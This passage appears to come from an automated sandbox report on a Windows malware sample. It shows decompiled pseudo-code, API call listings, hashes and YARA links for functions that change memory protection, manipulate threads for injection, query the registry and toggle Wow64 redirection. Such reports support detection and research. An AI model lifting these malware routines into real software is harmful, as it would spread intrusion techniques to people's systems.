							E00DD2A18(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00DD77EC(_t100);
						_t98 = _a16;
					}
					E00DD77EC(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00DD7801(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xdda38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                                                            0x00dd5afa
                                                            0x00dd5b03
                                                            0x00dd5b0a
                                                            0x00dd5b0f
                                                            0x00dd5b7c
                                                            0x00dd5b82
                                                            0x00dd5b87
                                                            0x00dd5b8e
                                                            0x00dd5b95
                                                            0x00dd5b98
                                                            0x00dd5d03
                                                            0x00dd5d0a
                                                            0x00dd5d0a
                                                            0x00dd5d0f
                                                            0x00dd5d11
                                                            0x00dd5d11
                                                            0x00dd5d1a
                                                            0x00dd5d1a
                                                            0x00dd5b9e
                                                            0x00dd5ba3
                                                            0x00dd5baa
                                                            0x00dd5cf9
                                                            0x00dd5cfc
                                                            0x00000000
                                                            0x00dd5cfc
                                                            0x00dd5bb0
                                                            0x00dd5bb5
                                                            0x00dd5bb8
                                                            0x00dd5bbf
                                                            0x00dd5bc2
                                                            0x00dd5c0b
                                                            0x00dd5c0b
                                                            0x00dd5c1e
                                                            0x00dd5c21
                                                            0x00dd5c28
                                                            0x00dd5c30
                                                            0x00dd5c35
                                                            0x00dd5c3f
                                                            0x00dd5c3f
                                                            0x00dd5c37
                                                            0x00dd5c37
                                                            0x00dd5c37
                                                            0x00dd5c37
                                                            0x00dd5c61
                                                            0x00dd5c69
                                                            0x00dd5c97
                                                            0x00dd5c9c
                                                            0x00dd5ca3
                                                            0x00dd5ca8
                                                            0x00dd5cac
                                                            0x00dd5cde
                                                            0x00dd5cae
                                                            0x00dd5cbb
                                                            0x00dd5cbe
                                                            0x00dd5cce
                                                            0x00dd5cd1
                                                            0x00dd5cd7
                                                            0x00dd5cd7
                                                            0x00dd5c6b
                                                            0x00dd5c78
                                                            0x00dd5c7b
                                                            0x00dd5c8d
                                                            0x00dd5c90
                                                            0x00dd5c90
                                                            0x00dd5ce8
                                                            0x00dd5cf4
                                                            0x00dd5cea
                                                            0x00dd5ced
                                                            0x00dd5ced
                                                            0x00dd5ce8
                                                            0x00dd5c61
                                                            0x00000000
                                                            0x00dd5c28
                                                            0x00dd5bd1
                                                            0x00dd5bd4
                                                            0x00dd5bdb
                                                            0x00dd5be1
                                                            0x00dd5be4
                                                            0x00dd5be6
                                                            0x00dd5bf2
                                                            0x00dd5bf5
                                                            0x00dd5bf5
                                                            0x00dd5bfb
                                                            0x00dd5c00
                                                            0x00dd5c00
                                                            0x00dd5c06
                                                            0x00000000
                                                            0x00dd5c06
                                                            0x00dd5b14
                                                            0x00000000
                                                            0x00dd5b3b
                                                            0x00dd5b3b
                                                            0x00dd5b47
                                                            0x00dd5b5a
                                                            0x00dd5b60
                                                            0x00dd5b68
                                                            0x00000000
                                                            0x00dd5b68

                                                            APIs
                                                            • StrChrA.SHLWAPI(00DD17B3,0000005F,00000000,00000000,00000104), ref: 00DD5B2D
                                                            • lstrcpy.KERNEL32(?,?), ref: 00DD5B5A
                                                              • Part of subcall function 00DD5691: lstrlen.KERNEL32(?,00000000,039C9D00,745EC740,00DD291A,039C9F05,00DD5FB9,00DD5FB9,?,00DD5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 00DD5698
                                                              • Part of subcall function 00DD5691: mbstowcs.NTDLL ref: 00DD56C1
                                                              • Part of subcall function 00DD5691: memset.NTDLL ref: 00DD56D3
                                                              • Part of subcall function 00DD2A5C: lstrlenW.KERNEL32(?,?,?,00DD5CC3,3D00DD90,80000002,00DD17B3,00DD462D,74666F53,4D4C4B48,00DD462D,?,3D00DD90,80000002,00DD17B3,?), ref: 00DD2A81
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00DD5B7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                            • String ID: ($\
                                                            • API String ID: 3924217599-1512714803
                                                            • Opcode ID: 4ce1313a263248b3f9095ef7b0f2f67709988726bf36164c8ddc28dba338db19
                                                            • Instruction ID: 95537921de73ef572040a739292a1ce4f0a506b27d2bf4b3013982140bb7e021
                                                            • Opcode Fuzzy Hash: 4ce1313a263248b3f9095ef7b0f2f67709988726bf36164c8ddc28dba338db19
                                                            • Instruction Fuzzy Hash: CA516B3510060ABFDF219FA8EC41EAA3BBAEF08310F148517FA1596225D736D925EF31
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD1697, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 32%
                                                            			E00DD1697(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00DD19B4(_t29, __edi, __eax); // executed
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0xdda2d4; // 0x2bed5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0xddb4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0xddb90c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0xdda100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}
















                                                            0x00dd1697
                                                            0x00dd169e
                                                            0x00dd16a2
                                                            0x00dd16a7
                                                            0x00dd16ae
                                                            0x00dd16b1
                                                            0x00dd16bb
                                                            0x00dd16c0
                                                            0x00dd16cc
                                                            0x00dd16d3
                                                            0x00dd16dd
                                                            0x00dd16dd
                                                            0x00dd16d5
                                                            0x00dd16d5
                                                            0x00dd16d5
                                                            0x00dd16d5
                                                            0x00dd16e3
                                                            0x00dd16e6
                                                            0x00dd16ee
                                                            0x00dd16f1
                                                            0x00dd16f4
                                                            0x00dd16f7
                                                            0x00dd16fc
                                                            0x00dd1705
                                                            0x00dd1712
                                                            0x00dd1707
                                                            0x00dd170d
                                                            0x00dd170d
                                                            0x00dd1718
                                                            0x00dd1718
                                                            0x00dd1720

                                                            APIs
                                                              • Part of subcall function 00DD19B4: SysAllocString.OLEAUT32(?), ref: 00DD1A10
                                                              • Part of subcall function 00DD19B4: SysAllocString.OLEAUT32(0070006F), ref: 00DD1A24
                                                              • Part of subcall function 00DD19B4: SysAllocString.OLEAUT32(00000000), ref: 00DD1A36
                                                              • Part of subcall function 00DD19B4: SysFreeString.OLEAUT32(00000000), ref: 00DD1A9A
                                                            • memset.NTDLL ref: 00DD16BB
                                                            • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00DD16F7
                                                            • GetLastError.KERNEL32 ref: 00DD1707
                                                            • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00DD1718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                                            • String ID: <
                                                            • API String ID: 593937197-4251816714
                                                            • Opcode ID: d503d70233bf99e50eeb4c92da005a73463adf1ebe8a2c27f8a2b230fb6f33f9
                                                            • Instruction ID: 756382740fec501889fc2bea51a6da16d96fafc7e57fbdcc841626c6d8048238
                                                            • Opcode Fuzzy Hash: d503d70233bf99e50eeb4c92da005a73463adf1ebe8a2c27f8a2b230fb6f33f9
                                                            • Instruction Fuzzy Hash: FA111275900218BBDB10EFA9D885BAA7BB8EB08394F04802BF905E7291D774E5448BB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457046C, Relevance: 7.6, APIs: 5, Instructions: 120memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045821CB: VirtualProtect.KERNELBASE(0457C495,?,00000040,?,0458B7A4,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000), ref: 045821F0
                                                              • Part of subcall function 045821CB: GetLastError.KERNEL32(?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 045821F8
                                                              • Part of subcall function 045821CB: VirtualQuery.KERNEL32(0457C495,0458B7A4,0000001C,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 0458220F
                                                              • Part of subcall function 045821CB: VirtualProtect.KERNEL32(0457C495,?,-2C9B417C,?,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 04582234
                                                            • GetLastError.KERNEL32(00000000,00000004,0456A09A,?,810C74FC,00000000,?,04588560,0000001C,04569E36,00000002,0457C495,00000001,0000000C,0458B7A0,0000000C), ref: 045705C5
                                                              • Part of subcall function 0456FB2B: lstrlen.KERNEL32(0458B620,0458B7A4,00000402,0458B7A4), ref: 0456FB63
                                                              • Part of subcall function 0456FB2B: lstrcpy.KERNEL32(00000000,0458B620), ref: 0456FB7A
                                                              • Part of subcall function 0456FB2B: StrChrA.SHLWAPI(00000000,0000002E), ref: 0456FB83
                                                              • Part of subcall function 0456FB2B: GetModuleHandleA.KERNEL32(00000000), ref: 0456FBA1
                                                            • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,0457C495,?,0458B620,0457C495,?,00000000,00000004,0456A09A,?,810C74FC), ref: 04570543
                                                            • VirtualProtect.KERNELBASE(0458B7A4,00000004,0456A09A,0456A09A,0457C495,?,00000000,00000004,0456A09A,?,810C74FC,00000000,?,04588560,0000001C,04569E36), ref: 0457055E
                                                            • RtlEnterCriticalSection.NTDLL(0458C300), ref: 04570582
                                                            • RtlLeaveCriticalSection.NTDLL(0458C300), ref: 045705A0
                                                              • Part of subcall function 045821CB: SetLastError.KERNEL32(0000000C,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 0458223D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 899430048-0
                                                            • Opcode ID: b9c3989943b469f9c4023eed038182c5c04b619eedaa52840778f33d74c519d5
                                                            • Instruction ID: df55c14e24650f00cde724d7b0320801a5e631c867461fc5f2c4910dcd54f193
                                                            • Opcode Fuzzy Hash: b9c3989943b469f9c4023eed038182c5c04b619eedaa52840778f33d74c519d5
                                                            • Instruction Fuzzy Hash: C7416F7190061AEFDB11DF65E844AADBBF4FF49710F048119E915AB290DB34F940EFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD43C6, Relevance: 7.6, APIs: 5, Instructions: 92synchronizationCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD43C6(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				long _t21;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0xdda2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0xdda2d4; // 0x2bed5a8
				_t3 = _t8 + 0xddb84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E00DD3971(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xdda2f8, 1, 0, _t30);
					E00DD77EC(_t30);
				}
				_t12 =  *0xdda2b4; // 0x2000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 == 0) {
						goto L11;
					}
					_t18 = E00DD11B8(); // executed
					if(_t18 != 0) {
						goto L11;
					}
					_t28 = StrChrW( *_t32, 0x20);
					if(_t28 != 0) {
						 *_t28 =  *_t28 & 0x00000000;
						_t28 =  &(_t28[1]);
					}
					_t21 = E00DD1697(0, _t28,  *_t32, 0); // executed
					_t31 = _t21;
					if(_t31 == 0) {
						if(_t25 == 0) {
							goto L21;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							goto L19;
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t14 = E00DD4BD9(_t32, _t26); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}


















                                                            0x00dd43c7
                                                            0x00dd43ce
                                                            0x00dd43d8
                                                            0x00dd43dc
                                                            0x00dd43e2
                                                            0x00dd43ef
                                                            0x00dd43f6
                                                            0x00dd43fa
                                                            0x00dd440c
                                                            0x00dd440e
                                                            0x00dd440e
                                                            0x00dd4413
                                                            0x00dd441a
                                                            0x00dd4425
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd4427
                                                            0x00dd442e
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd443b
                                                            0x00dd443f
                                                            0x00dd4441
                                                            0x00dd4446
                                                            0x00dd4446
                                                            0x00dd444e
                                                            0x00dd4453
                                                            0x00dd4457
                                                            0x00dd445b
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd4469
                                                            0x00dd446d
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd446d
                                                            0x00000000
                                                            0x00dd446f
                                                            0x00dd446f
                                                            0x00dd446f
                                                            0x00dd4475
                                                            0x00dd4477
                                                            0x00dd4477
                                                            0x00dd447c
                                                            0x00dd4481
                                                            0x00dd4485
                                                            0x00dd4497
                                                            0x00dd4497
                                                            0x00dd449b
                                                            0x00dd44a1
                                                            0x00dd44a1
                                                            0x00dd44a4
                                                            0x00dd44a6
                                                            0x00dd44a9
                                                            0x00dd44a9
                                                            0x00dd44b0
                                                            0x00dd44b6
                                                            0x00dd44b6

                                                            APIs
                                                              • Part of subcall function 00DD3971: lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,039C9D00,745EC740,00DD5FB9,?,69B25F44,E8FA7DD7,00000000,?,?,?,00DD5FB9), ref: 00DD39A7
                                                              • Part of subcall function 00DD3971: lstrcpy.KERNEL32(00000000,00000000), ref: 00DD39CB
                                                              • Part of subcall function 00DD3971: lstrcat.KERNEL32(00000000,00000000), ref: 00DD39D3
                                                            • CreateEventA.KERNEL32(00DDA2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00DD17D2,?,?,?), ref: 00DD4405
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            • StrChrW.SHLWAPI(00DD17D2,00000020,61636F4C,00000001,00000000,?,?,00000000,?,00DD17D2,?,?,?), ref: 00DD4435
                                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,00DD17D2,00000000,?,00000000,?,00DD17D2,?,?,?,?,?,?,?,00DD6E29), ref: 00DD4463
                                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00DD17D2,?,?,?), ref: 00DD4491
                                                            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00DD17D2,?,?,?), ref: 00DD44A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 73268831-0
                                                            • Opcode ID: 1d80ab74325c930681260fee933b7d52d6f9559f31673eca03db83529b670bef
                                                            • Instruction ID: 1f4aae212a9130cf3c13331ca15d487989b9805b1ac5198d439367b58ff8c639
                                                            • Opcode Fuzzy Hash: 1d80ab74325c930681260fee933b7d52d6f9559f31673eca03db83529b670bef
                                                            • Instruction Fuzzy Hash: 2E21C7326023126BD7315BA99C45B6AB7D8EF84765F094227FE41EB391DBB1DC8086B0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045768B2, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04581736: RegCreateKeyA.ADVAPI32(80000001,049BA7F0,?), ref: 0458174B
                                                              • Part of subcall function 04581736: lstrlen.KERNEL32(049BA7F0,00000000,00000000,00000000,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?,04575AB0), ref: 04581774
                                                            • RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                            • RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                            • HeapFree.KERNEL32(00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576934
                                                            • RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                                            • String ID:
                                                            • API String ID: 1633053242-0
                                                            • Opcode ID: ee1a90adb8cf0012410a31520ed50e0bff20dca8bc1c4b1dd219880243b1083b
                                                            • Instruction ID: e459a965c923badfad0a13bd37fffac60e1d046506a06de7529125632d5229dc
                                                            • Opcode Fuzzy Hash: ee1a90adb8cf0012410a31520ed50e0bff20dca8bc1c4b1dd219880243b1083b
                                                            • Instruction Fuzzy Hash: 7F1128B6500109FFDF019F95EC84CAE7B7EFB88264B15042AF501A7211EB31AE55EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045821CB, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(0457C495,?,00000040,?,0458B7A4,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000), ref: 045821F0
                                                            • GetLastError.KERNEL32(?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 045821F8
                                                            • VirtualQuery.KERNEL32(0457C495,0458B7A4,0000001C,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 0458220F
                                                            • VirtualProtect.KERNEL32(0457C495,?,-2C9B417C,?,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 04582234
                                                            • SetLastError.KERNEL32(0000000C,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 0458223D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$ErrorLastProtect$Query
                                                            • String ID:
                                                            • API String ID: 148356745-0
                                                            • Opcode ID: 00e4463b564436b58e792c512d57f05091985bcfc5dfbf221bffda691576d1ff
                                                            • Instruction ID: 44f1ccd7590aca15b009ffa02e4da5086f8630d8d05d35d068ac150ab9bc0ad3
                                                            • Opcode Fuzzy Hash: 00e4463b564436b58e792c512d57f05091985bcfc5dfbf221bffda691576d1ff
                                                            • Instruction Fuzzy Hash: 2F010C72500209EF9F11AF95DC4499EBBBDFF0C255B00446AF902E3121DB75EA14EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04561943, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04561971
                                                            • ResumeThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 045619FB
                                                            • WaitForSingleObject.KERNEL32(00000064), ref: 04561A09
                                                            • SuspendThread.KERNELBASE(?), ref: 04561A1C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                                            • String ID:
                                                            • API String ID: 3168247402-0
                                                            • Opcode ID: fe4739c3daa6373aa63e24a0a71488db0f436f8c0884f577de176cffb2a8c149
                                                            • Instruction ID: 48d9395a66ab1a7c9c69efadbcb3aa757af9d24d555f89db2480996886578685
                                                            • Opcode Fuzzy Hash: fe4739c3daa6373aa63e24a0a71488db0f436f8c0884f577de176cffb2a8c149
                                                            • Instruction Fuzzy Hash: DF417FB1104702AFE721DF54D840E7BBBE9FF84354F044A2DFA9692160DB31E954EBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD4182, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 61%
                                                            			E00DD4182(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				void* _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				long _t52;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_t44 =  *0xdda144(0, 1,  &_v24); // executed
				if(_t44 != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E00DD77D7(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0xdda2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E00DD77EC(_v20);
							if(_v8 == 0) {
								_t52 = E00DD44D1(_v24, _t64); // executed
								_v8 = _t52;
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}




















                                                            0x00dd418a
                                                            0x00dd418d
                                                            0x00dd4196
                                                            0x00dd4199
                                                            0x00dd419c
                                                            0x00dd41a4
                                                            0x00dd42a2
                                                            0x00dd42ad
                                                            0x00dd42b0
                                                            0x00dd42b8
                                                            0x00dd42bf
                                                            0x00dd42bf
                                                            0x00dd42b2
                                                            0x00dd42b5
                                                            0x00dd42b5
                                                            0x00000000
                                                            0x00dd42b5
                                                            0x00dd41ad
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd41ba
                                                            0x00dd41c2
                                                            0x00dd4299
                                                            0x00000000
                                                            0x00dd4299
                                                            0x00dd41ce
                                                            0x00dd41d5
                                                            0x00dd41d8
                                                            0x00dd4287
                                                            0x00dd428e
                                                            0x00dd428e
                                                            0x00dd4294
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd41de
                                                            0x00dd41de
                                                            0x00dd41de
                                                            0x00dd41de
                                                            0x00dd41e3
                                                            0x00dd41e5
                                                            0x00dd41e5
                                                            0x00dd41f2
                                                            0x00dd41fa
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd41fc
                                                            0x00dd4209
                                                            0x00dd420f
                                                            0x00dd420f
                                                            0x00dd4212
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd421f
                                                            0x00dd4233
                                                            0x00dd4269
                                                            0x00dd426c
                                                            0x00dd426f
                                                            0x00dd4277
                                                            0x00dd427d
                                                            0x00dd4282
                                                            0x00dd4282
                                                            0x00000000
                                                            0x00dd4277
                                                            0x00dd4235
                                                            0x00dd423c
                                                            0x00dd4244
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd4246
                                                            0x00dd4251
                                                            0x00dd4254
                                                            0x00000000
                                                            0x00dd425b
                                                            0x00dd425b
                                                            0x00000000
                                                            0x00dd425b
                                                            0x00dd4254
                                                            0x00dd421c
                                                            0x00000000
                                                            0x00dd425e
                                                            0x00dd425e
                                                            0x00000000

                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 00DD42A2
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • GetLastError.KERNEL32 ref: 00DD4216
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 00DD4226
                                                            • GetLastError.KERNEL32 ref: 00DD4246
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 35602742-0
                                                            • Opcode ID: bb4e6b106f17bb4e1151569b5b69f05a12801328944eb9a2fc648da3103fc061
                                                            • Instruction ID: 7b03e056d004cd57ede2719ae483079a3215793ca8b381db08afc13939d4e25c
                                                            • Opcode Fuzzy Hash: bb4e6b106f17bb4e1151569b5b69f05a12801328944eb9a2fc648da3103fc061
